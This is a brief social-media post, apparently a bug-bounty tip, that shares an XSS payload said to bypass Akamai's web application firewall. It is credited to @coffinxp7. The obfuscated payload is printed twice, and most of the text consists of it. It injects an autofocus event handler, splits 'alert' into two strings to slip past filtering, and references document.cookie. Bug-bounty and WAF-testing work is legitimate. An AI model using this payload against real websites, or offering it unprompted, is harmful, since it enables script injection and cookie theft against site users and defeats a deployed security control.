Akamai WAF Bypass for XSS vulnerability. The payload used in this bypass is '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>'. This bypass allows an attacker to execute a Cross-Site Scripting attack on a website protected by Akamai WAF. Credit to @coffinxp7. #bugbountytips #bugbountytip #BugBounty #hackthebox
? Akamai WAF Bypass #XSS
? Credit: @coffinxp7
? Payload:
'"><A HRef=" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>#bugbountytips #bugbountytip #BugBounty #hackthebox
— Sergio Medeiros (@grumpzsux) May 11, 2024